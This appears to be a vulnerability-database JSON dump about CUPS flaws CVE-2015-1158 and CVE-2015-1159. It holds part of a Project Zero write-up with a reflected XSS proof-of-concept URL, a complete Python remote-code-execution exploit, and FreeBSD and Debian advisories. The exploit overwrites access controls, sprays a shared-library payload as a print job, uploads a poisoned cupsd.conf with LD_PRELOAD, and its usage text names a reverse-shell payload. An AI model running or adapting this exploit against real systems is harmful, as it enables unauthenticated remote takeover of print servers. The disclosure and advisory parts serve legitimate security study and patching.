mitigations. \nBackground \n \nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158) \n \nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'. \n \nscheduler/ipp.c:1626: \n \n/* \n* Free old strings\u2026 \u2190 Even 'old' strings need to be freed. \n*/ \n \nfor (i = 0; i < attr->num_values; i ++) \n{ \n_cupsStrFree(attr->values[i].string.text); \nattr->values[i].string.text = NULL; \nif (attr->values[i].string.language) \u2190 for all values in an attribute \n{ \n_cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string \nattr->values[i].string.language = NULL; \n} \n} \n \nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request. \n \nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times. \n \nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations. \n \nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build. \n \n \nA Reflected XSS in the Web Interface (CVE-2015-1159) \n \nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'. \n \nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting. \n \nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters: \n<>\"'& \n \nThese are replaced with their HTML entity equivalents ('<' etc...). \n \nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650: \n \nif (*s == '<') \n{ \n/* \n* Pass <A HREF=\"url\"> and </A>, otherwise quote it... \n*/ \n \nif (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9)) \n{ \nfputs(\"<A HREF=\\\"\", out); \ns += 9; \n \nwhile (*s && *s != '\\\"') \n{ \nif (*s == '&') \nfputs(\"&\", out); \nelse \nputc(*s, out); \n \ns ++; \n} \n \nif (*s) \ns ++; \n \nfputs(\"\\\">\", out); \n} \n \nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context. \n \nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue. \n \nTake this example from templates/help-header.tmp:19: \n \n<P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P> \n \nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags. \n \nRequesting the following URI will demonstrate this reflected XSS: \nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search \n \nThe 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors. \n \n \nUpstream Fixes \n \nApple Fix (April 16, 2015): \nhttps://support.apple.com/kb/DL1807 \n \nOfficial CUPS fix for downstream vendors (June 8, 2015): \nhttps://www.cups.org/str.php?L4609 \nhttp://www.cups.org/blog.php?L1082+I0+Q \n \nProject Zero Bug \n \nFor those interested, the sample exploit can be found here: \n \nhttps://code.google.com/p/google-security-research/issues/detail?id=455 \nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37336.tar.gz \n \nDisclosure Timeline \n \nMarch 20th, 2015 - Initial notification to Apple \nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3 \nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3 \nJune 18th, 2015 - Disclosure + 90 days \nJune 19th, 2015 - P0 publication \n \nAttack Surface Reduction in CUPS 2.0.3+ \n \nCUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs: \n \nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead. \nLD_* and DYLD_* environment variables are blocked when CUPS is running as root. \nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only). \n \nAcknowledgements \n \nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits. \n \nConclusion \n \nNo one prints anything anymore anyways. \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132389/cups-xss.txt"}, {"lastseen": "2017-02-03T17:04:32", "description": "", "published": "2017-02-03T00:00:00", "type": "packetstorm", "title": "CUPS Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2017-02-03T00:00:00", "id": "PACKETSTORM:140920", "href": "https://packetstormsecurity.com/files/140920/CUPS-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution \n# Google Dork: n/a \n# Date: 2/2/17 \n# Exploit Author: @0x00string \n# Vendor Homepage: cups.org \n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2 \n# Version: <2.0.3 \n# Tested on: Ubuntu 14/15 \n# CVE : CVE-2015-1158 \nimport os, re, socket, random, time, getopt, sys \nfrom socket import * \nfrom struct import * \n \ndef banner(): \nprint ''' \nlol ty google \n0000000000000 \n0000000000000000000 00 \n00000000000000000000000000000 \n0000000000000000000000000000000 \n000000000 0000000000 \n00000000 0000000000 \n0000000 000000000000 \n0000000 000000000000000 \n000000 000000000 000000 \n0000000 000000000 000000 \n000000 000000000 000000 \n000000 000000000 000000 \n000000 00000000 000000 \n000000 000000000 000000 \n0000000 000000000 0000000 \n000000 000000000 000000 \n0000000000000000 0000000 \n0000000000000 0000000 \n00000000000 00000000 \n00000000000 000000000 \n0000000000000000000000000000000 \n00000000000000000000000000000 \n000 0000000000000000000 \n0000000000000 \n@0x00string \ngithub.com/0x00string/oldays/CVE-2015-1158.py \n''' \n \ndef usage (): \nprint (\"python script.py <args>\\n\" \n\" -h, --help: Show this message\\n\" \n\" -a, --rhost: Target IP address\\n\" \n\" -b, --rport: Target IPP service port\\n\" \n\" -c, --lib /path/to/payload.so\\n\" \n\" -f, --stomp-only Only stomp the ACL (no postex)\\n\" \n\"\\n\" \n\"Examples:\\n\" \n\"python script.py -a 10.10.10.10 -b 631 -f\\n\" \n\"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\") \nexit() \n \ndef pretty (t, m): \nif (t is \"+\"): \nprint \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\", \nelif (t is \"-\"): \nprint \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\", \nelif (t is \"*\"): \nprint \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\", \nelif (t is \"!\"): \nprint \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\", \n \ndef createDump (input): \nd, b, h = '', [], [] \nu = list(input) \nfor e in u: \nh.append(e.encode(\"hex\")) \nif e == '0x0': \nb.append('0') \nelif 30 > ord(e) or ord(e) > 128: \nb.append('.') \nelif 30 < ord(e) or ord(e) < 128: \nb.append(e) \n \ni = 0 \nwhile i < len(h): \nif (len(h) - i ) >= 16: \nd += ' '.join(h[i:i+16]) \nd += \" \" \nd += ' '.join(b[i:i+16]) \nd += \"\\n\" \ni = i + 16 \nelse: \nd += ' '.join(h[i:(len(h) - 0 )]) \npad = len(' '.join(h[i:(len(h) - 0 )])) \nd += ' ' * (56 - pad) \nd += ' '.join(b[i:(len(h) - 0 )]) \nd += \"\\n\" \ni = i + len(h) \n \nreturn d \n \nclass tcpsock: \ndef __init__(self, sock=None): \nif sock is None: \nself.sock = socket( \nAF_INET, SOCK_STREAM) \nself.sock.settimeout(30) \nelse: \nself.sock = sock \ndef connect(self, host, port): \nself.sock.connect((host, int(port))) \ndef tx(self, msg): \nself.sock.send(msg) \ndef rx(self): \ntmp = self.sock.recv(1024) \nmsg = \"\" \nwhile tmp: \nmsg += tmp \ntmp = self.sock.recv(1024) \nreturn msg \n \ndef txrx (ip, port, proto, txpacket): \nif (proto is \"tcp\"): \nsock = tcpsock() \nelif (proto is \"udp\"): \nsock = udpsock() \nelse: \nreturn None \nsock.connect(ip, port) \nsock.tx(txpacket) \nrxpacket = sock.rx() \nreturn rxpacket \n \ndef locatePrinters(rhost, rport=\"631\"): \nrequest = ( \"GET /printers HTTP/1.1\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"\\x0d\\x0a\") \nresponse = txrx(rhost, int(rport), \"tcp\", request) \nif response is not None: \nm = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response) \nif m is not None: \nprinter = m.group(1) \npretty(\"+\",\"printer found: \" + printer) \nelse: \npretty(\"-\",\"no printers\") \nexit(1) \nreturn printer \n \ndef preparePayload(libpath): \nwith open(libpath, 'rb') as f: \npayload = f.read() \nif payload is not None: \npretty(\"*\",\"Payload:\\n\" + createDump(payload)) \nelse: \npretty(\"-\",\"something went wrong\") \nusage() \nreturn payload \n \ndef seedTarget(rhost, rport, printer, payload): \ni = random.randint(1,3) \nreqid = str(pack(\">i\",(i+2))) \nreqid2 = str(pack(\">i\",(i+3))) \nprinter_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer \n \ncreate_job_packet = (\"\\x02\\x00\" \n\"\\x00\\x05\"+ \nreqid+ \n\"\\x01\" \n\"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\" \n\"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\" \n\"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri + \n\"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\" \n\"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\" \n\"\\x02\" \n\"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\" \n\"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\" \n\"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\" \n\"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\" \n\"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\" \n\"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\" \n\"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\" \n\"\\x03\") \npretty(\"*\",\"Sending createJob\") \n \nhttp_header1 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \ncreateJobRequest = http_header1 + create_job_packet \nblah = txrx(rhost,int(rport),\"tcp\",createJobRequest) \nif blah is not None: \nm = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah) \nif m is not None: \njobid = m.group(1) \nelse: \npretty(\"-\",\"something went wrong\"); \nexit() \n \npretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\") \npretty(\"*\", \"Sending sendJob\") \n \nsend_document_packet = (\"\\x02\\x00\" \n\"\\x00\\x06\"+ \nreqid2+ \n\"\\x01\" \n\"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\" \n\"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\" \n\"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri + \n\"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) + \n\"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\" \n\"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\" \n\"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\" \n\"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\" \n\"\\x03\"+ \npayload) \n \nhttp_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \nsendJobRequest = http_header2 + send_document_packet \nblah2 = txrx(\"172.20.32.3\",631,\"tcp\",sendJobRequest) \npretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\") \npretty(\"*\",\"job id: \" + jobid) \nreturn jobid \n \ndef stompACL(rhost, rport, printer): \ni = random.randint(1,1024) \nprinter_url = \"ipp://\" + rhost + \":\" + rport + printer \n \nadmin_stomp = (\"\\x02\\x00\" # vers 2.0 \n\"\\x00\\x05\"+ # op id: Create Job (0x0005) \nstr(pack(\">i\",(i+1)))+ \n\"\\x01\" # op attributes marker \n\"\\x47\" # charset \n\"\\x00\\x12\" # name len: 18 \n\"attributes-charset\" \n\"\\x00\\x08\" # val len: 8 \n\"us-ascii\" \n\"\\x48\" # natural language \n\"\\x00\\x1b\" # name len: 27 \n\"attributes-natural-language\" \n\"\\x00\\x06\" # val len: 6 \n\"/admin\" \n\"\\x45\" # printer-uri \n\"\\x00\\x0b\" # name len 11 \n\"printer-uri\" + \nstr(pack(\">h\", len(printer_url))) + printer_url + \n\"\\x42\" # name without lang \n\"\\x00\\x14\" # name len: 20 \n\"requesting-user-name\" \n\"\\x00\\x06\" # val len: 6 \n\"/admin\" \n\"\\x02\" # job attrs marker \n\"\\x21\" # integer \n\"\\x00\\x06\" # name len: 6 \n\"copies\" \n\"\\x00\\x04\" # val len: 4 \n\"\\x00\\x00\\x00\\x01\" # 1 \n\"\\x42\" # name w/o lang \n\"\\x00\\x19\" # name len: 25 \n\"job-originating-host-name\" \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x36\" # nwl \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x16\" # val len: 22 \n\"\\x00\\x06\" # length \n\"/admin\" \n\"\\x00\\x0c\" \n\"BBBBBBBBBBBB\" \n\"\\x03\") # end of attributes \n \nconf_stomp = (\"\\x02\\x00\" # vers 2.0 \n\"\\x00\\x05\"+ # op id: Create Job (0x0005) \nstr(pack(\">i\",(i+2)))+ \n\"\\x01\" # op attributes marker \n\"\\x47\" # charset \n\"\\x00\\x12\" # name len: 18 \n\"attributes-charset\" \n\"\\x00\\x08\" # val len: 8 \n\"us-ascii\" \n\"\\x48\" # natural language \n\"\\x00\\x1b\" # name len: 27 \n\"attributes-natural-language\" \n\"\\x00\\x0b\" # val len: 11 \n\"/admin/conf\" \n\"\\x45\" # printer-uri \n\"\\x00\\x0b\" # name len 11 \n\"printer-uri\" + \nstr(pack(\">h\", len(printer_url))) + printer_url + \n\"\\x42\" # name without lang \n\"\\x00\\x14\" # name len: 20 \n\"requesting-user-name\" \n\"\\x00\\x0b\" # val len: 11 \n\"/admin/conf\" \n\"\\x02\" # job attrs marker \n\"\\x21\" # integer \n\"\\x00\\x06\" # name len: 6 \n\"copies\" \n\"\\x00\\x04\" # val len: 4 \n\"\\x00\\x00\\x00\\x01\" # 1 \n\"\\x42\" # name w/o lang \n\"\\x00\\x19\" # name len: 25 \n\"job-originating-host-name\" \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x36\" # nwl \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x1b\" # val len: 27 \n\"\\x00\\x0b\" # length \n\"/admin/conf\" \n\"\\x00\\x0c\" \n\"BBBBBBBBBBBB\" \n\"\\x03\") # end of attributes \n \nhttp_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \nhttp_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \npretty(\"*\",\"stomping ACL\") \npretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp)) \npretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp))) \ntime.sleep(1) \npretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp)) \npretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp))) \n \nhttp_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"\\x0d\\x0a\") \npretty(\"*\",\"checking /admin\") \npretty(\"*\",\">:\\n\" + createDump(http_header_check)) \nres = txrx(rhost,rport,\"tcp\",http_header_check) \npretty(\"*\",\"<:\\n\" + createDump(res)) \nm = re.search('200 OK', res) \nif m is not None: \npretty(\"+\",\"ACL stomp successful\") \nelse: \npretty(\"-\",\"exploit failed\") \nexit(1) \n \n \ndef getConfig(rhost, rport): \ni = random.randint(1,1024) \noriginal_config = \"\" \nhttp_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \npretty(\"*\",\"grabbing configuration file....\") \nres = txrx(rhost,rport,\"tcp\",http_request) \nres_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\") \noriginal_config = res_array[1] \npretty(\"*\",\"config:\\n\" + original_config + \"\\n\") \nreturn original_config \n \ndef putConfig(rhost, rport, config): \nhttp_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Keep-Alive\\x0d\\x0a\" \n\"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \npretty(\"*\",\"overwriting config...\") \npretty(\"*\",\">:\\n\" + createDump(http_request + config)) \npretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config))) \n \ndef poisonConfig(config, name): \nconfig = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d00\" + name + \"-001\\x0a\" \nreturn config \n \ndef main(): \nrhost = None; \nnoshell = None; \noptions, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',]) \nfor opt, arg in options: \nif opt in ('-h', '--help'): \nusage() \nelif opt in ('-a','--rhost'): \nrhost = arg; \nelif opt in ('-b','--rport'): \nrport = arg; \nelif opt in ('-c','--lib'): \nlibpath = arg; \nelif opt in ('-f','--stomp-only'): \nnoshell = 1; \nbanner() \nif rhost is None or rport is None: \nusage() \npretty(\"*\",\"locate available printer\") \nprinter = locatePrinters(rhost, rport) \npretty(\"*\",\"stomp ACL\") \nstompACL(rhost, rport, printer) \nif (noshell is not None): \npretty(\"*\",\"fin\") \nexit(0) \npretty(\"*\",\"prepare payload\") \npayload = preparePayload(libpath) \npretty(\"*\",\"spray payload\") \njobid = seedTarget(rhost, rport, printer, payload) \npretty(\"*\",\"grab original config\") \nOG_config = getConfig(rhost, rport) \npretty(\"*\",\"generate poison config\") \nevil_config = poisonConfig(OG_config, jobid) \npretty(\"*\",\"upload poison config\") \nputConfig(rhost, rport, evil_config) \npretty(\"*\",\"fin\") \nexit(0); \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140920/cups-exec.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:33:14", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "\nCUPS development team reports:\n\nThe new release addresses two security vulnerabilities,\n\t add localizations for German and Russian, and includes\n\t several general bug fixes. Changes include:\nSecurity: Fixed CERT VU #810572/CVE-2015-1158/CVE-2015-1159\n\t exploiting the dynamic linker (STR #4609)\nSecurity: The scheduler could hang with malformed\n\t gzip data (STR #4602)\n\n", "edition": 4, "modified": "2015-06-09T00:00:00", "published": "2015-06-09T00:00:00", "id": "A40EC970-0EFA-11E5-90E4-D050996490D0", "href": "https://vuxml.freebsd.org/freebsd/a40ec970-0efa-11e5-90e4-d050996490d0.html", "title": "cups -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:17:07", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "Package : cups\nVersion : 1.4.4-7+squeeze8\nCVE ID : CVE-2015-1158 CVE-2015-1159\n\nTwo critical vulnerabilities have been found in the CUPS printing \nsystem:\n\nCVE-2015-1158 - Improper Update of Reference Count\n Cupsd uses reference-counted strings with global scope. When parsing\n a print job request, cupsd over-decrements the reference count for a\n string from the request. As a result, an attacker can prematurely\n free an arbitrary string of global scope. They can use this to \n dismantle ACL\u2019s protecting privileged operations, and upload a\n replacement configuration file, and subsequently run arbitrary code\n on a target machine.\n\n This bug is exploitable in default configurations, and does not\n require any special permissions other than the basic ability to\n print.\n\nCVE-2015-1159 - Cross-Site Scripting \n A cross-site scripting bug in the CUPS templating engine allows the\n above bug to be exploited when a user browses the web. This XSS is\n reachable in the default configuration for Linux instances of CUPS,\n and allows an attacker to bypass default configuration settings that\n bind the CUPS scheduler to the \u2018localhost\u2019 or loopback interface.\n\n", "edition": 7, "modified": "2015-06-09T10:27:37", "published": "2015-06-09T10:27:37", "id": "DEBIAN:DLA-239-1:10F45", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201506/msg00003.html", "title": "[SECURITY] [DLA 239-1] cups security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T01:01:57", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3283-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 09, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : cups\nCVE ID : CVE-2015-1158 CVE-2015-1159\n\nIt was discovered that CUPS, the Common UNIX Printing System, is\nvulnerable to a remotely triggerable privilege escalation via cross-site\nscripting and bad print job submission used to replace cupsd.conf on the\nCUPS server.\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1.5.3-5+deb7u6.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.7.5-11+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.7.5-12.\n\nWe recommend that you upgrade your cups packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2015-06-09T20:25:07", "published": "2015-06-09T20:25:07", "id": "DEBIAN:DSA-3283-1:BE2B4", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00178.html", "title": "[SECURITY] [DSA 3283-1] cups security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:55:59", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3172-1 security@debian.org\nhttp://www.debian.org/security/ Sebastien Delafond\nFebruary 25, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : cups\nCVE ID : CVE-2014-9679\nDebian Bug : 